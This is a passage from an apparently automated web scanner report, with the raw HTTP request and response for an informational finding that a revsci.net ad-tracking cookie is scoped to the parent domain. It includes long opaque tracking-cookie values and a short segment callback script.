ZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_RWWj="MLsXtSMNZzhvJZE469JExPALrEtuUCF+EhmSre0boepdUBIObzB9/pok4StALLEl9sHwbuIq7UHwThiSP1sznicofHt6PUSNbgXakHZCOQtDOR/YNpbDZrI2MakMEO8YvDy8ht2BwjwxeJN/WXTaMQXC1n77CHcjb6QSoYxM0x4JtTra0pW7SNDzUpmB3DiVcptR1EYeryjEBs9w0dOhsHsfyhsVubiTESbJgEEs4ndXJnW8xKY1HL32JJSPCSxu1ck5H9On58mXKqfY+TqtgPe9qWHGGn7s2CvLFvC178V40hYcHerLK/FjzLRpRKCLw3NjSFnX7CLetKZhAKD3UQfRG2uRxZM6XvqfAT3i8j3IA7RmV3/mO3tSGfCbI07vImR4oMHsg1ZCh+zZALukmHUmdGgNUogZxLbUs/8LflWl2lWav1ZGo6AQw74yYgVko3vNaOqRdvV9AMkTdpifWLHUQ363yb2GMOLgTSzza0Vq7IQ55nYX15bpIGa0NW/+bDU4M/THVMiI27xi/ZEduskwnWa8xspgda3YvKLB/9n9YaQ84snrTfoju+iJF467zXZhVBbRm2Ajs+Jzj7GsGM438a3nS26g8+sX6nF4uJvm9OBZ6XCej3dWpZkd7Wy6VWtoT6AQYUMUeVOxg+cfxcGaTSm0wQQu8M5exDnc6OTqcBhlJw68LG4N3JdqZrpN0K7owy/6LhvFFYAhwbaPJVF8NXPCLCA8hJPcvn2UxwB3jembMmh5BnZm7tgCyGDuhEEn7sPyZc+zmHV9AYcOwHBY+3qRLwcJ7CNaBewj8gjUTrjMI6Oz72mrP+9vSY6MEZaETvp+Q4oMI1hPqswIlOfBIzRfhukXdqBHuLQ+ZxJCxCvSfGLEP/SxNU/9zACT9khpxCB3Iq5zRQMN6todQXrD1+zwYAYq5iifIO/CssaQ047RwdqVSOPX1cN7IMu+CFaJ/q5feFvGjGz54VMpQEQrz7QvUeo0Zyb5Ar4YFRUqu8/GECn9dX81I0ESQu2IUR67OgkS3w5C39HoJbRca0d/Md49KTI025El8ssgsHXfa+d8wr3Pai72i6aSBzqjUtcgTjzlp+L839gXv1OL3Kc7GWLz5puQDh+gKJdFLxhJCyX4wuOINPJuFk+MYvGpWy+BM5zYZAgnYZROsMFxNAxbLsdowJ8wLiFlce7P7c6Dkw2NvI/SJaW+kTNhbbG07P9JU9J8FuAeAMEpXr/Fjj+6li5+7BBvoXyw6be7gxvzZdlnIbjT3gKL+f/Kl2j7kevcgr3SUZkOLLTFVxyG5Pa3nmUCAgMLJ8pjOpE12Jzj9zbmV+prWKPMYNG1IAMWdZaZJdenltHUjqSQC2NJrCO248Qh"; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+ztEYKy6jwOfu2Ls8do6UXNNLzEGyW7PxalYAgx56aSaUsdqZwyPH1ZrHP7Wq1xwhICRgzgJv6bVhx869U8+lVAcotGV6+xKW95Q2/WKU7YoaQv1jId6BojFl6Bi/CWod0iJSTjX22pFAGwRDxY6oikceGSEZ/YtKKwARmEo0J//6ghQMwCdr1XN7GzxdQPxF5MTHBOxOlQl50eazBZIzAi5fpV//fGMFzjVKQBsDeISNMeegfZ6MrPGE6XKDY3h8Lmyqf4r8p4C6/M6/PaOlS2+TNnBI6sUGWdSFOBYmSjY0Gp9yS0l9fvaTKyn5CiMtay0zYz8tigK9viFa/yHpKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XqLBS91uurCbrZI5ax1yCQ7b+0J8FRZ6ASfr8mCVOA5yDWU5JEaRB0Ph1hk3TqNx4Kv1u0Q3QJcTVpGN2v7vbdjgZFWvukjFrPXBqUpNW2XM3T3DgquRaTu9pk4wnpOlJqqDDcZhTqm1txbnKTc262p7SI32tKRDNFMaxhYxVcI7fM7rH93pqUpsIp7QxSrjdrHQgs8YUJCIRRMMMjJP13Xu2JCZakMvJ6QV11uk0p0o2YHgKZOGAM0+t+Ahw9OSqG1qiOH9YvMCVYfum15Q7vMquF25Av1sQLg+RhfBU4WqTUiSwQARrgh4l7uj1WoUKOtXQM3skB/punwhsyeN/nU5W13FkawgLEjDEoPQUDPoQAMrEW78ISvFyJGbwrL0ZqgardDX6vRHNuQZWRbawgLYmJccd9iGQXnNrALh3E7VbTyT9rFknOQxAEOvASjXHAtopelimiUsFwM/2HTAFZPksb+PUBecTuF7c3UA9MZGvdJ9gZJCqUW4hAWPhR2ZZaZfyUkkUr5UdBiBlLI7NWaebk65a1YqihxRSFxW6hZah0RhGKQJK1sWDr1sg2nlNw7qzsouFlwV0ccv023CDzNZTyrQrV/Gg+ga5XGrPRnAQXj1xYX2KpjtfkH28I58MUA7lGbUl4N1jHwLxU5v+/s7YjN55ddodLDL7S0NQwPbYOWgSarqjgKLvS9VuAzK1B4LzbDSrujm9s90PvjAL74nQ7+JsRs09YwMYg7EYLl6O7/vK5/q1aaUT2FsypzJKO/j269fl+Urni4rjOqnwMJD7w+h+P2vczngNnlVqEGp3A+vXw+ve6oCalLgPwoBySOS6JM3jBCc0o0eAad4R4xFyWVt2dJYWGpNyHzH8xlAPZUWBhaVBTHTFirRft1hUrJ0bMs/z5C0KimBMz2K+m8Z7QfhywkpmDlBibqdI+1Yr7mqbIerMxlb/MZNqen6aInkUFR1ok09IRoJE+48RN0JRRtGJdHbYygsXV1zV0EzCGuxqAwojOpfaVmIkj3ifilY4Az1iNUvwuyDJ9sd/rAVNa9UQUQZgo4nO/R9H9myHBOgzxaRd3EyIlv0OVPWui12vquSDoJkHkj/YJ3BST6YNVAcDXnEHzIDa3UAzr6Kvb2zfN8VpwPFUyz8KzuXDHtcugSUzgpVUIfBmksylXzod3M2aee9Y75Yeajb1Fuf3t7WQEImImCkl1Qr58z8AEaCDDC9xHk9Ozih01W2qPnOPup0PRixgv+snBCS5ArR+bVcBZWRLm6Nac65+OY/oOKA3TS9EG9mDwgE+nYVP52JaRMzSFXi4/GtpM4+lhUjVgNZHLX7KGj8xxKiRwu9ZBDYqg/4OJP31Xd1j+6g21X6J93o0Kd/SejWRHyZ1UdQYSLB87uWUHG6EjtXb"; rsi_segs_1000000=pUPF5EOhOHMQpzax0RBh/hoCIKFQg7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WLZYBIlHHq5L+Vu6oYeS0lSb84FoFlDVAUEgoeqnG3CUwQTGxfWB8xHls9O7wrmK7H9XC/sILoR02nII8WfF7UWXthiRAcKM7VuHarYQlzdfWgOmS1cmYa0YjJmUqEKNdoIx/pAQ38QgU6Kt0r0CtfXkOSp49SgRYyqY64JE4k9CaWsl4V+NF0BQ/2X9fzmaEEv/09SgmT/OWVbOp9LGUu/pJz2bt2TifO5b8/JzdYCKLm23Mnuixul8CLF2kuBfEEOSrfa9SXrOkbrpGJbm1uYa2qqUgUv7xH+FeHWKJRGbi7f1UJuQWLbLntgbLEyh+OjwwFPt3EoIhpX/z4UdMN4anbmomufHZ2S2+MipT82K0EUkzp0lnuR/sacXt7bU50JYLCO/8Q3yK3SydWiVV5hEhz1LkYD/BE9vMM7wPxNQAFGNnR7LZ252h9+2NMtIEQQNL2rPSUcxnJ3AM9xN6aTnPSHMyGfkKRHtqErQCdua+JKhdhc97u3mb/ahGd1zeNCUSylUq5BH7o1DyPw9Fqv8Cs0gemRILGw+mTdZqSbNAqUnt314AyrDsTS08iipZ69cs3CXNNg=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638OC50EZltz+itXswYg6aG0Cz85wyWVUagoY/y3ZrR2yFdORAExtLnEqN2My6sEyzWP3Oe/MA8C1FjR18yFHvMOs1J+Dr9NMmAZxdYL3KF+ENbS9yb/mOe297VH+NlH7TE83cuTXCnr8SOCGmMmdMA6h175yxIjBb8Mzz+EdulvJish3WpFuaj1UsbDzE/DdcFBwAjTQbVdeid7P0ZSWlEh4DBz8ZSIsBQtyIIhSOP7byyJpLCzXFOprPkZ6Z2LaGx1ar6uvvfXos1Y4bGwiXzOEz0MQNLJUAZ52Q2cej8mFe+Zr6mqja6lDLQSZuadJulAwL6WHmVZDAvAlEla/glRUyBL2+ufhADgmtrTIbBcM8tSNpifAGlhZw5PwYPffBz0FoI0Shh0kOn2LoPZG2jFUBn6Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:14:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:14:20 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.126. http://pix04.revsci.net/I10985/b3/0/3/1008211/153416135.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/153416135.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQpzax0RBh/hoCyNk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WLZYBIlHHq5L+Vu6oYeS0lSb84FoFlDVAUEgoeqnG3CWwQTGxfWB8xHls9O7wrmK7H9XO38QK/GK4m862ulXtBHxCFUVWq3L7O2akFAHGDjHWNgyYfzAVKcGUKsb7c0ueNVXz4bz+RGuUL0cgwDiNcshcM5rYLHakbTgOQpubiK0FnBwLC4Iw0QwgHlnG6G7nFLlfK6YH9XLbiwKr5G1YfVXDdoBS3tnzQ08ZuM5KoSKLm23Mt2SxjiYI8+RcXY5QaOh0SofSSymrU58McEJNKMZ4/9Aq1RNvG6F8HWKJRGbi5fzUpuQWLbTntgaLEyh+Ovw0FNtzEoIhpX/z4XCnFAOi1IlVuByF8jp0Xb98q1rGU21xgkt4RCn3JvBikgQlZI5JK0CxY7oVaG5eG9rlgxhrs9bkID/BCDos5cWZVp51AN9l3FoPWkzbOjBE8nea+Ut0CKbZnO5TIzGv94HEiuEF/hc+OsRT6l6ts5L0U+d+JKlpeBaK8xVnt+lGd11fNCUSykyq5Anzo1D0fw9EKv8Cg2XpPnETLw1EMX29eMJEqUnP3x4AypDPjS0kmCx+2RfowHaNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:39:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/153416135.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_6dX6="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe35M/kolpihGJj4pmAsZrcS5HxvCqNxuQOmBjUcmYgx5OtJgeG16E3zcnedDEwiYGhrUlSBjxn8Tk+AoDE7qB5PtkqPF3DJmRMVyf/LcI6ckQ75dwm9hCEEBmI8zcHFcCDUzoRzpDlS1sGN97VCC+Gy4pEJrTuyBa4iz+wVZ+srKQ1XrfuatTO+1XIkmtKVIqhKSa5GTJ0ON+SRkiQ8gPw7h9Wo49VbeYeGn3svkUyKx2kBHu1V9XvM5POMRCcifB5LPMHfUKHAA7zYQsiJVSHuoUraI4MNCYdUD3nw47TE6OyT458OufyhiwbWcv/IBtFEH4PPJLoOMdoWG1WFxEZ5R+tq+XTnHPrIByzJX9UEdDswfahY/cKB8tEtgnItsUN3r1/mpqSciYu61VkStULbrM4PRa13fMTvu3KQvY6Fn/3L8bvLFuwSSxKs0JqtSVwBb76v1phXAc5OF1PfgBwCtOtxGtbv1kGgfIg8bexI3iljbddh5A0bOqvuH5/FQJvoxfYAn1UEdCu5MCUt2u/wffXdP0cRx/OrKDm6DBXfm7cVylmSLAQaAaHpXYnT7dcawfDGpEvYsvafFusaWWHDbEYv79bzSimeKfvS6YUbkaQvRjw+oPEI7QbZycRuCZryB1PFNL4NNg8CdaCa3XzD3lB8IKwoGvsvuNtaP04PNxePwWAJ0C4U6O+yhjLgkOIdAfbBnAJkru/I53s+XhIwjYX2eD9Mxuj9jdNYYcPFpV38olHa/TDS2tUwbfDNA9qDR+AAkxaFsr4xI3BxCbrFlzHlcJZtdVNoLLIw+oWAcDsAvMqActfJ14wuxDaU6oTgeYhAQUY0BXLxihrxwioTXoppCDMoYRxvYTzHLnjUG9wtWp1e49wuBse1+e+1+ZavnXSUfN3HOZXuFa+5vAHF9Ezyf/XFjVaolXV7EmMMo61SZP5nyP/HZ6G7H0FuqO2WCYPIDg0543XVt2Pt1w7zJay+pTZ31xyIKdArQg5sk1gNTWEoHYY8go4OttXUyGnLzpjRRL5ZbuyGwi6unPtPDBtZlHCtI8PkMnW7XyzujF93Z6Gi9uZGvksjhiz6k0hRr3g1z+pJj0DT3xZ3brAsYVbGbpCuwZUZULVOHloank9gcLV/u8QXZ2Ae7qSgpui3Nop4aiKP2Alvefy/U1d0zQarwNSkzpI5Mk/LenaLX/lVy6zL+T1uqfdTuQgkWA67IfCE4eYyh0T1vCR4JaM/atnMiOu3zsuF2ABSc0YM7a3prvPpg/QmOSDH11/zXkP8yU/dVFlAE6tqqdXrQGDCPyKIBrOiMWOm6KwUXKL1jk="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+ztEYq95zdyQBcR324r+RdRYGVevAjGT29qg4gx56aSaU8frb5yGhD8AABxhBK1G5ea9rMPB6T9VKcaTRXFRzFwdml7Gwe4zXDERfM+H49CXya1QJboJVO3NluZK/TH7bhdsDW7DshLlZ9nVVtWeAHa9mf1w+qfnODgikt3Zxo2O2P2Cu+5fcAMpKERXRWBxd44Qcs5yG7Oq+2JQ/AxPDCGOEDevB9eJqOIj3SxkI98nwegmEya/CQOBkenuGjJ3snWDNblR8c0NFCGcVPKaFKbfRHzxmSKCMlYAS30XRfI2xAOOBxzV5+JKAUSmdGSN7Khrv4D4uYjGqTnG29p98sb9SgFOCoc0dTEOU2QXxaikigNN6q4jiiPDKp+hGvQcCHAf+DjEUMe4ekL/I8PwsfDaZmTd82NzuW+yiuslg1Qz3/ajItUx36jMuLXHEhqbiHVAdGASVOSelJXvtPiIlSkT6IkNC8vQz0bAv+RuqjA+L/zEXE9zrQKNwkCv3anfbCWfnqofXIrKLKaTrK1OSHh+oJtnM5k8gUvUGEn1f8npHiioBgxU9lcKivt96381xBluNUgIzMBSDjzukaJjSp54cZkp00teu+KR8mDr0agvROfh3tItG8qDT+xHP7mBLV/8z76tqC2ijzFaXHug0QJFKrKvLL1Uj2fjkLClFPpEtE9VyWQDtLWok4+KKx735isOu+P6xRGMgOiCmyN8rRK7uqG9phUCGvE5qyOr85P